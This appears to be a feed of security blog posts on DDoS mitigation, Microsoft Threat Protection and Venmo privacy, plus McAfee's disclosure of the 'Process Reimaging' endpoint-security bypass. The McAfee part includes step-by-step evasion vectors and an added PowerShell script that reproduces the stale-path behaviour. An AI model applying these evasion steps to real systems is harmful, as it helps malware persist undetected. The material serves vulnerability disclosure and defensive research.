Three key strategies to block DDoS attacks

While it’s crucial to have an automated system in place that can quickly respond to attacks, it’s equally important to implement strategies that help achieve your goal of ensuring service availability to legitimate users.

After all, DDoS attacks are asynchronous in nature: You can’t prevent the attacker from launching an attack, but with three critical strategies in place, you can be resilient to the attack, while protecting your users.

Each of the three methods listed below is known as a source-based DDoS mitigation strategy. Source-based strategies use the cause of the traffic, that is, where it comes from and how it behaves, as the basis for choosing what to block. The alternative, destination-based mitigation, relies on traffic shaping to prevent the system from falling over.

While destination traffic shaping is effective in preserving system health from being overwhelmed during an attack, it is equally fraught with indiscriminate collateral damage to legitimate users.

Tracking deviation: A tracking deviation strategy works by observing traffic on an ongoing basis to learn what qualifies as normal and what represents a threat.
  • Specifically, a defence system can analyse the data rate or query rate across multiple characteristics (e.g. BPS, PPS, SYN-FIN ratio, session rate, etc.) to determine which traffic is legitimate and which is malicious; it may also identify bots or spoofed traffic by their inability to answer challenge questions.
Pattern recognition: A pattern recognition strategy uses machine learning to parse, in real time, the unusual patterns of behaviour commonly exhibited by DDoS botnets and reflected amplification attacks.
  • For example, DDoS attacks are initiated by a motivated attacker who leverages an orchestration platform to provide the distributed weapons with instructions on how to flood the victim with unwanted traffic. Both the command and control (C&C) traffic and the distributed attack itself exhibit patterns that can be leveraged as a causal blocking strategy.
Reputation: To utilise reputation as a source-based blocking strategy, a DDoS defence system uses researcher-provided threat intelligence on DDoS botnet IP addresses and on the tens of millions of exposed servers used in reflected amplification attacks.
  • The system then uses that intelligence to block any matching IP addresses during an attack.
Any of these three source-based DDoS mitigation strategies requires more computing capabilities than indiscriminate destination protection.

They do, however, have the significant advantage of being able to prevent legitimate users from being blocked, thereby reducing downtime and preventing unnecessarily lost profits.

Knowing that, it’s safe to say that these three mitigation strategies are all well worth the investment.
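As an added example (not part of this article or of A10’s products), here is a small tracking-deviation detector in Python: it learns a per-metric baseline from constructed peace-time samples of the characteristics named above (bits/s, packets/s, SYN:FIN ratio, session rate), scores live samples by how far they sit above that baseline, and maps the worst deviation onto an assumed escalation policy (monitor, rate-limit, divert to scrubbing) of the kind the automation section describes. The sample values, the 5% standard-deviation floor and the policy thresholds are all assumptions.

```python
from statistics import mean, pstdev

# Traffic characteristics the article names for tracking deviation.
METRICS = ("bps", "pps", "syn_fin_ratio", "sessions_per_s")

# Constructed peace-time samples (one per sampling interval) for a small site.
PEACETIME_SAMPLES = [
    {"bps": 80e6,  "pps": 9_000,  "syn_fin_ratio": 1.05, "sessions_per_s": 120},
    {"bps": 95e6,  "pps": 11_000, "syn_fin_ratio": 0.98, "sessions_per_s": 140},
    {"bps": 90e6,  "pps": 10_500, "syn_fin_ratio": 1.10, "sessions_per_s": 130},
    {"bps": 85e6,  "pps": 9_800,  "syn_fin_ratio": 1.02, "sessions_per_s": 125},
    {"bps": 100e6, "pps": 11_500, "syn_fin_ratio": 0.95, "sessions_per_s": 150},
]

# Assumed escalation policy: deviation (in standard deviations) -> action.
# Checked top-down, so the most severe action whose floor is reached wins.
ESCALATION_POLICY = [
    (10.0, "divert-to-scrubbing"),  # hand the prefix to the scrubbing centre
    (4.0, "rate-limit"),            # throttle the offending characteristic locally
    (0.0, "monitor"),               # nothing unusual, keep learning
]


def learn_baseline(samples, min_relative_stdev=0.05):
    """Per-metric (mean, standard deviation) learned from peace-time samples.

    A floor on the standard deviation (a fraction of the mean) stops a very
    steady metric from turning tiny wobbles into alerts.
    """
    baseline = {}
    for m in METRICS:
        values = [s[m] for s in samples]
        mu = mean(values)
        sigma = max(pstdev(values), min_relative_stdev * abs(mu), 1e-9)
        baseline[m] = (mu, sigma)
    return baseline


def deviation_scores(baseline, sample):
    """How many standard deviations each metric sits ABOVE its baseline.

    Only upward deviations matter for flood detection, so drops score 0.
    """
    return {m: max(0.0, (sample[m] - baseline[m][0]) / baseline[m][1])
            for m in METRICS}


def detect(baseline, sample, threshold=4.0):
    """Return [(metric, score), ...] for metrics over the threshold, worst first."""
    scores = deviation_scores(baseline, sample)
    flagged = [(m, z) for m, z in scores.items() if z >= threshold]
    return sorted(flagged, key=lambda mz: mz[1], reverse=True)


def escalation_action(baseline, sample):
    """Map the worst deviation in a sample onto the escalation policy."""
    worst = max(deviation_scores(baseline, sample).values())
    for floor, action in ESCALATION_POLICY:
        if worst >= floor:
            return action
    return "monitor"


if __name__ == "__main__":
    base = learn_baseline(PEACETIME_SAMPLES)
    # Constructed live samples: a busy-but-normal interval and a SYN flood
    # (packet rate and SYN:FIN ratio explode while completed sessions do not).
    busy = {"bps": 97e6, "pps": 11_200, "syn_fin_ratio": 1.08, "sessions_per_s": 145}
    flood = {"bps": 2.5e9, "pps": 900_000, "syn_fin_ratio": 40.0, "sessions_per_s": 135}
    for name, sample in (("busy", busy), ("flood", flood)):
        print(name, detect(base, sample), "->", escalation_action(base, sample))
```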

Adrian Taylor, Regional Vice President at A10 Networks

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimaging leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API, dubbed K32GetProcessImageFileName, allows endpoint security solutions such as Windows Defender to verify whether the EXE file associated with a process contains malicious code. With process reimaging, however, a cybercriminal can subvert the security solution’s trust in the Windows operating system APIs, which can return inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misidentifies which file name or path it is looking at and can no longer tell whether a process is trustworthy. By using this technique, cybercriminals can keep malicious processes executing on a user’s device without the user even knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

The evolution of Microsoft Threat Protection, June update

Since our announcement of Microsoft Threat Protection at Microsoft Ignite, our goal has been to execute and deliver on our promise of helping organizations protect themselves from today’s sophisticated and complex threat landscape. As we close out our fiscal year, we’ve continued progress on developing Microsoft Threat Protection, launching new capabilities and services. Hopefully, you’ve had a chance to follow our monthly updates.

As we previously shared, Microsoft Threat Protection enables your organization to:

This month, we want to share new capabilities that are starting public previews.

Efficient remediation and response for identity threats

Presently, efficient and effective response to identity threats is crucial, and Microsoft Threat Protection is built on the industry’s most widely used and comprehensive identity security service. As more organizations adopt hybrid environments, data is spread across multiple applications, is on-premises and in the cloud, and is accessed by multiple devices (often personal devices) and users. Most organizations no longer have a defined network perimeter, making traditional security tools obsolete. Identity is the control plane that is consistent across all elements of the modern organization.

At RSA, we announced a new unified Identity Threat Investigation experience between Azure Active Directory (Azure AD) Identity Protection, Azure Advanced Threat Protection (ATP), and Microsoft Cloud App Security. This experience will go into public preview this month.

Part of the new experience is enabled through Azure AD’s new integration with Azure ATP. Also, integration between Azure AD and Microsoft Cloud App Security enables continuous monitoring of user behavior from sign-in through the entire session. Microsoft Threat Protection’s identity services leverage user behavior analytics to create a dynamic investigation priority score (Figure 1) based on signals from Azure AD, Microsoft Cloud App Security, and Azure ATP. The investigation priority is calculated by assessing security alerts, abnormal activities, and potential business and asset impact related to each user. This score can help Security Operations (SecOps) teams focus on and respond to the top user threats in the organization.

Figure 1. The investigation priority view.

To learn more, read Investigating identity threats in hybrid cloud environments.

Game-changing capabilities for endpoint security

Every month, Microsoft Threat Protection detects over 5 billion endpoint threats through its Microsoft Defender ATP service. Customers have long asked us to extend our industry-leading endpoint security beyond the Windows OS. This was a major driving force for us to deliver endpoint security natively for macOS in limited preview earlier this year. We’re excited to announce that Microsoft Defender ATP for macOS is in public preview.

Microsoft Threat Protection customers who have turned on the Microsoft Defender ATP preview features can access Microsoft Defender ATP for Mac via the onboarding section in the Microsoft Defender Security Center. For more information and resources, including system requirements, prerequisites, and a list of improvements and new features, check out the Microsoft Defender ATP for Mac documentation.

To further enhance your endpoint security, “live response,” our new incident response action for SecOps teams, is currently in public preview. Today, your employees often work beyond the corporate network boundary, whether from home or while traveling. The risk for compromise is potentially higher when a user is remote. Imagine the executive who connects their laptop to hotel Wi-Fi and is compromised. With current endpoint security services, SecOps would need to wait until the executive got back to the office, leaving a high-value laptop exposed. With our new live response, SecOps teams gain instant access to a compromised machine regardless of location, as well as the ability to gather any required forensic information.

This powerful feature allows you to:

  • Gather a snapshot of connections, drivers, scheduled tasks, and services, as well as search for specific files or request file analysis to reach a verdict (clean, malicious, or suspicious).
  • Download malware files for reverse-engineering.
  • Create a tenant-level library of forensic tools like PowerShell scripts and third-party binaries that allows SecOps to gather forensic information like the MFT table, firewall logs, event logs, process memory dumps, and more.
  • Run remediation activities such as quarantine file, stop process, remove registry, remove scheduled task, and more.

To learn more, try the live response DIY or read Investigate entities on machines using live response.

Figure 2. Run remediation commands.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit the Microsoft Threat Protection webpage. Organizations, like Telit, have already transitioned to Microsoft Threat Protection and our partners are also leveraging its powerful capabilities.

Begin a trial of Microsoft Threat Protection services, which also includes our newly launched SIEM, Azure Sentinel, to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, June update appeared first on Microsoft Security.

3 Tips Venmo Users Should Follow to Keep Their Transactions Secure

You’ve probably heard of Venmo, the quick and convenient peer-to-peer mobile payments app. From splitting the check when eating out with friends to dividing the cost of bills, Venmo is an incredibly easy way to share money. However, users’ comfort with the app can sometimes result in a few negligent security practices. In fact, computer science student Dan Salmon recently scraped seven million Venmo transactions to prove that users’ public activity can be easily obtained if they don’t have the right security settings flipped on. Let’s explore his findings.

By scraping the company’s developer API, Salmon was able to download millions of transactions across a six-month span. That means he was able to see who sent money to whom, when they sent it, and why – just as long as the transaction was set to “public.” Mind you, Salmon’s download comes just a year after a German researcher downloaded over 200 million transactions from the public-by-default app.

These data scrapes, if anything, act as a demonstration. They prove to users just how crucial it is to set up online mobile payment apps with caution and care. Therefore, if you’re a Venmo or other mobile payment app user, make sure to follow these tips in order to keep your information secure:

  • Set your settings to “private” immediately. Only the sender and receiver should know about a monetary transaction in the works. So, whenever you go to send money on Venmo or any other mobile payment app, make sure the transaction is set to “private.” For Venmo users specifically, you can flip from “public” to “private” by just toggling the setting at the bottom right corner of the main “Pay or Request” page.
  • Limit the amount of data you share. Just because something is designed to be social doesn’t mean it should become a treasure trove of personal data. No matter the type of transaction you’re making, always try to limit the amount of personal information you include in the corresponding message. That way, any potential cybercriminals out there won’t be able to learn about your spending habits.
  • Add on extra layers of security. Beyond flipping on the right in-app security settings, it’s important to take any extra precautions you can when it comes to protecting your financial data. Create complex logins to your mobile payment apps, participate in biometric options if available, and ensure your mobile device itself has a passcode as well. This will all help ensure no one has access to your money but you.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 3 Tips Venmo Users Should Follow to Keep Their Transactions Secure appeared first on McAfee Blogs.

Why Process Reimaging Matters

As this blog goes live, Eoin Carroll will be stepping off the stage at Hack in Paris having detailed the latest McAfee Advanced Threat Research (ATR) findings on Process Reimaging. Admittedly, this technique probably lacks a catchy name, but be under no illusion: the technique is significant and is worth paying very close attention to.

Plain and simple, the objective of malicious threat actors is to bypass endpoint security. It is this exact game of cat and mouse that the security industry has been playing with malware writers for years, and one that, quite frankly, will continue. This ongoing battle will shape the future of cyber, and drive innovation in attack techniques and the ways in which we defend against them.  As part of this process it is crucial that we, the McAfee ATR team, continually identify techniques that could be used by malicious actors successfully.  It is this work that has led to the identification of a technique we call Process Reimaging, which was successful in bypassing endpoint security solutions (ESSs). To be clear, our objective is to stay ahead of malicious actors in identifying evasion techniques, with the broader goal of providing a safer computing environment for all organizations.

This technique is detailed by Eoin in a comprehensive technical blog titled In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass. The following is a summary of the findings.

Process Reimaging targets non-EDR ESSs. It is a post-exploitation technique, meaning it targets users who have already fallen victim, for example to a phishing or drive-by-download attack, so that the malicious process can execute undetected and dwell on an endpoint for a significant period of time. The Windows kernel exports functionality to support the user-mode components of ESSs, which depend on it for their protection and detection capabilities. There are numerous APIs, such as K32GetProcessImageFileName, that allow ESSs “to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure.” Our research focused on this functionality: because the APIs return stale and inconsistent FILE_OBJECT paths, a malicious actor can potentially bypass the process attribute verification undertaken by the Windows operating system. To be more precise, this allowed McAfee ATR to develop a proof-of-concept that was not detected by Windows Defender, and that will not be detected until a signature is created to block the file on disk before the process itself is created, or until a full scan is executed.

The technique succeeds because the ESS relies on the Windows operating system to verify process attributes: the ESS naturally trusts a process whose file on disk is non-malicious, since it assumes the OS has identified the correct file on disk associated with that process for the ESS to scan.

Releasing details of the technique

With the public release of security research, there is always a significant risk that any released information can be utilized by adversaries for nefarious activities. The balance of security research versus irresponsible disclosure is an issue we continually wrestle with, and these findings are no different. In the process of conducting due diligence, we were able to identify the use of Process Doppelganging, with Process Hollowing as its fallback defense evasion technique, within the SynAck ransomware in 2018. Since the Process Doppelganging technique was weaponized within SynAck ransomware less than five months after its disclosure at Black Hat Europe in 2017, we can only assume that the Process Reimaging technique is, or soon will be, close to being used by threat actors to bypass detection.

The post Why Process Reimaging Matters appeared first on McAfee Blogs.

In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass

Process Reimaging Overview

The Windows Operating System has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts the ability of non-EDR (Endpoint Detection and Response) Endpoint Security Solutions (such as Microsoft Defender Realtime Protection) to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee’s Advanced Threat Research to develop a new post-exploitation evasion technique we call “Process Reimaging”. This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre ATT&CK Defense Evasion category; however, it is much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work on any endpoint security vendor or product implementing the APIs discussed below.

The Windows Kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support User-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure. The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. We have developed a proof-of-concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE.

The PoC allowed us to persist a malicious process (post exploitation) which does not get detected by Windows Defender.

The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and either blocks it on disk before process creation or performs a full scan on the suspect machine post-compromise to detect the file on disk. In addition to Process Reimaging weaponization and protection recommendations, this blog includes a technical deep dive on reversing the Windows Kernel APIs used for process attribute verification and on the Process Reimaging attack vectors. We use the SynAck ransomware as a case study to illustrate the impact of Process Reimaging relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender’s ability to detect Process Hollowing or Doppelganging, but to the subverting of trust for process attribute verification.

Antivirus Scanner Detection Points

When an Antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time.

The actual sequence for loading an image is as follows:

  1. FileCreate – the file is opened so that it can be mapped into memory.
  2. Section Create – the file is mapped into memory.
  3. Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO.
  4. ImageLoad – the file is loaded.
  5. CloseFile – the file is closed.

If the Antivirus scanner is active at the point of load, it can use any one of the above steps (1, 2 and 4) to protect the operating system against malicious code. If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading.

There is currently no documented method to securely identify the underlying file associated with a running process on Windows.

This is due to Windows’ inability to retrieve the correct image filepath from the NTDLL APIs. This can be shown to evade Defender (MpMsEng.exe/MpEngine.dll) where the file being executed is a “Potentially Unwanted Program” such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects it correctly at phase 1 or 2. If Defender is not enabled, or if the launched program is not recognized by its current signature files, then the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, then the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process.

Subverting Trust

The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS Endpoints per figure 1 below.

Figure 1 – Mitre Enterprise ATT&CK

Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging with the objective of impersonating trusted processes. There are other Process manipulation techniques as documented by Mitre ATT&CK and Unprotect Project,  but we will focus on Process Hollowing and Process Doppelganging. Process manipulation techniques exploit legitimate features of the Windows Operating System to impersonate trusted process executable binaries and generally require code injection.

ESSs place inherent trust in the Windows Operating System for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs’ trust in the Windows Operating system could be subverted for digital signature validation.

Similarly, Process Reimaging subverts an ESS’s trust in the Windows Operating System for process attribute verification.

When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS trusted infrastructure.

McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, with associated campaigns. This insight helps organizations understand adversaries’ behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities.

Process Manipulation Techniques (SynAck Ransomware)

McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques, so that they can be compared to Process Reimaging based on a real-world observation.

Process Manipulation defense evasion techniques continue to evolve. Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows Operating system they can be difficult to defend against if the Antivirus scanner does not block prior to process launch.

Process Hollowing

“Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis” (see figure 2 below).

Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing

Process Doppelganging

“Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext” (see figure 3 below).

Figure 3 – SynAck Ransomware Defense Evasion with Process Doppelganging

Process Reimaging Weaponization

The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. This allows an adversary to persist a malicious process (post exploitation) by hiding the physical location of the process EXE (see figure 4 below).

Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging

Process Reimaging Technical Deep Dive

NtQueryInformationProcess retrieves process information from fields of the kernel EPROCESS structure, and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field of the EPROCESS structure.

The EPROCESS structure contains filename and path information at the following fields/offsets (see figure 5 below):

  • +0x3b8 SectionObject (filename and path)
  • +0x448 ImageFilePointer* (filename and path)
  • +0x450 ImageFileName (filename)
  • +0x468 SeAuditProcessCreationInfo (filename and path)

* this field is only present in Windows 10

Figure 5 – Code Complexity IDA Graph Displaying NtQueryInformationProcess Filename APIs within NTDLL

The kernel API NtQueryInformationProcess is consumed by the following kernelbase/NTDLL APIs:

  • K32GetModuleFileNameEx
  • K32GetProcessImageFileName
  • QueryFullProcessImageImageFileName

The VADs hold a pointer to FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (see figure 6 below).

The kernel API NtQueryVirtualMemory is consumed by the following kernelbase/NTDLL API:

  • GetMappedFileName

Figure 6 – Code Complexity IDA Graph Displaying NtQueryVirtualMemory Filename API within NTDLL

Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified after process creation. Windows does reflect FILE_OBJECT filename changes in some of the above fields.

The VADs reflect any filename change for a loaded image after process creation, but they don’t reflect any rename of the filepath.

The EPROCESS fields also fail to reflect any renaming of the process filepath and only the ImageFilePointer field reflects a filename change.

As a result, the user-mode APIs built on NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other applications (see Table 1 below).

Table 1 OS/Kernel version and API Matrix

Prerequisites for all Attack Vectors

Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite of Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework.

Process Reimaging Attack Vectors

FILE_OBJECT Filepath Changes

Simply renaming the filepath of an executing process results in the Windows OS returning incorrect image location information for all APIs (see figure 7 below). This impacts all Windows OS versions at the time of testing.

Figure 7 FILE_OBJECT Filepath Changes – Filepath Changes Impact all Windows OS versions

FILE_OBJECT Filename Changes

Filename Change >= Windows 10

Simply renaming the filename of an executing process causes Windows to return the pre-rename image information from the K32GetProcessImageFileName API (see figure 8.1.1 below). This has been confirmed on Windows 10.

Figure 8.1.1 FILE_OBJECT Filename Changes – Filename Changes impact Windows >= Windows 10

Per figure 8.1.2 below, GetModuleFileNameEx and QueryFullProcessImageName do see the filename change, because of a new EPROCESS field, ImageFilePointer, at offset 0x448. The instruction there (mov r12, [rbx+448h]) loads the ImageFilePointer from offset 0x448 into the EPROCESS structure.

Figure 8.1.2 NtQueryInformationProcess (Windows 10) – Windows 10 RS1 x64 ntoskrnl version 10.0.14393.0

Filename Change < Windows 10

Simply renaming the filename of an executing process causes Windows to return the pre-rename image information from the K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageName APIs (see figure 8.2.1 below). This has been confirmed on Windows 7 and Windows 8.

Figure 8.2.1 FILE_OBJECT Filename Changes – Filename Changes Impact Windows < Windows 10

Per figure 8.2.2 below, GetModuleFileNameEx and QueryFullProcessImageName return the pre-rename filename (PsReferenceProcessFilePointer references the SectionObject at EPROCESS offset 0x3b8).

Figure 8.2.2 NtQueryInformationProcess (Windows 7 and 8) – Windows 7 SP1 x64 ntoskrnl version 6.1.7601.17514
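To see the filename and filepath change vectors on your own build rather than on the figures, here is an added PowerShell reproduction (example code, not from the McAfee post). It starts a benign stand-in process (a copy of cmd.exe named phase1.exe), renames first the file and then its directory, and after each rename prints what the four APIs from Table 1 return, marking any value that still carries the pre-rename name as STALE. The P/Invoke declarations are the documented Win32 prototypes; the class and function names (ProcImage, Get-ImageReports, Show-Reports) and the dirA/dirB paths are my own. Run it in a PowerShell of the same bitness as the stand-in process, since Get-Process needs that to read the main module base.

```powershell
# Added example, not code from the McAfee post: reproduce the FILE_OBJECT filename and
# filepath change vectors against a benign stand-in process and print what each
# user-mode API from Table 1 reports after each rename.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class ProcImage
{
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
    // K32GetProcessImageFileName -> NtQueryInformationProcess (reads the SectionObject path)
    [DllImport("psapi.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern uint GetProcessImageFileName(IntPtr hProcess, StringBuilder name, uint size);
    // K32GetModuleFileNameEx with hModule = NULL -> path of the main image
    [DllImport("psapi.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern uint GetModuleFileNameEx(IntPtr hProcess, IntPtr hModule, StringBuilder name, uint size);
    // QueryFullProcessImageName -> NtQueryInformationProcess (Win32 path form)
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool QueryFullProcessImageName(IntPtr hProcess, uint flags, StringBuilder name, ref uint size);
    // GetMappedFileName -> NtQueryVirtualMemory (reads the VAD's FILE_OBJECT path)
    [DllImport("psapi.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern uint GetMappedFileName(IntPtr hProcess, IntPtr addr, StringBuilder name, uint size);
}
'@

function Get-ImageReports([int]$ProcessId) {
    $PROCESS_QUERY_INFORMATION = 0x0400; $PROCESS_VM_READ = 0x0010
    $h = [ProcImage]::OpenProcess($PROCESS_QUERY_INFORMATION -bor $PROCESS_VM_READ, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) { throw "OpenProcess($ProcessId) failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    try {
        $r = [ordered]@{}
        $sb = New-Object System.Text.StringBuilder 1024
        [void][ProcImage]::GetProcessImageFileName($h, $sb, $sb.Capacity); $r['K32GetProcessImageFileName'] = $sb.ToString()
        $sb = New-Object System.Text.StringBuilder 1024
        [void][ProcImage]::GetModuleFileNameEx($h, [IntPtr]::Zero, $sb, $sb.Capacity); $r['K32GetModuleFileNameEx'] = $sb.ToString()
        $sb = New-Object System.Text.StringBuilder 1024; [uint32]$n = $sb.Capacity
        [void][ProcImage]::QueryFullProcessImageName($h, 0, $sb, [ref]$n); $r['QueryFullProcessImageName'] = $sb.ToString()
        # GetMappedFileName needs an address inside the mapping: use the main module base.
        $base = (Get-Process -Id $ProcessId).MainModule.BaseAddress
        $sb = New-Object System.Text.StringBuilder 1024
        [void][ProcImage]::GetMappedFileName($h, $base, $sb, $sb.Capacity); $r['GetMappedFileName'] = $sb.ToString()
        [pscustomobject]$r
    } finally { [void][ProcImage]::CloseHandle($h) }
}

function Show-Reports([string]$Label, [int]$ProcessId, [string]$StaleMarker) {
    "`n== $Label =="
    foreach ($p in (Get-ImageReports $ProcessId).PSObject.Properties) {
        # A value that still contains the pre-rename name is out of sync with the disk.
        $state = if ($StaleMarker -and $p.Value -like "*$StaleMarker*") { 'STALE' } else { 'current' }
        '{0,-28} {1,-8} {2}' -f $p.Name, $state, $p.Value
    }
}

$root = Join-Path $env:TEMP 'reimage'                     # hypothetical scratch location
$dirA = Join-Path $root 'dirA'; $dirB = Join-Path $root 'dirB'
New-Item -ItemType Directory -Force -Path $dirA | Out-Null
# A benign, self-contained binary stands in for the "phase1.exe" of the demo video.
Copy-Item "$env:SystemRoot\System32\cmd.exe" (Join-Path $dirA 'phase1.exe')
$p = Start-Process (Join-Path $dirA 'phase1.exe') -ArgumentList '/k' -WindowStyle Hidden -PassThru
Start-Sleep -Seconds 1
try {
    Show-Reports 'baseline (disk: dirA\phase1.exe)' $p.Id ''
    # Vector 1: FILE_OBJECT filename change. The running image can be renamed in place.
    Rename-Item (Join-Path $dirA 'phase1.exe') 'phase2.exe'
    Show-Reports 'after filename rename (disk: dirA\phase2.exe)' $p.Id 'phase1.exe'
    # Vector 2: FILE_OBJECT filepath change. Rename the directory, not a copy of the file.
    Rename-Item -Path $dirA -NewName 'dirB'
    Show-Reports 'after filepath rename (disk: dirB\phase2.exe)' $p.Id '\dirA\'
} finally {
    Stop-Process -Id $p.Id -Force -ErrorAction SilentlyContinue
    Start-Sleep -Milliseconds 500
    Remove-Item -Recurse -Force $root -ErrorAction SilentlyContinue
}
```

Per the post, the expected Windows 10 output is: after the filename rename only K32GetProcessImageFileName is STALE (the other two NtQueryInformationProcess consumers go through ImageFilePointer), and after the filepath rename all four are STALE. On Windows 7 and 8, K32GetModuleFileNameEx and QueryFullProcessImageName should be STALE after the filename rename as well. K32GetProcessImageFileName returns an NT device path (\Device\HarddiskVolumeN\...) rather than a Win32 path, which is why the check only matches on the trailing name components.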

LoadLibrary FILE_OBJECT reuse

LoadLibrary FILE_OBJECT reuse leverages the fact that when LoadLibrary or CreateProcess is called on an EXE or DLL after a prior LoadLibrary and FreeLibrary of that same file, the process reuses the image FILE_OBJECT still in memory from the earlier LoadLibrary.

Exact Sequence is:

  1. LoadLibrary (path\filename)
  2. FreeLibrary (path\filename)
  3. LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename)

At step 3 Windows creates a VAD entry in the process that reuses the FILE_OBJECT created at step 1 and still resident in memory. That VAD now carries the pre-rename filepath for the file on disk, so the GetMappedFileName API returns the wrong location on disk for the image in question.

The following prerequisites are required to evade detection successfully:

  • The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary
  • Filepath must be renamed (dropping the same file into a newly created path will not work)
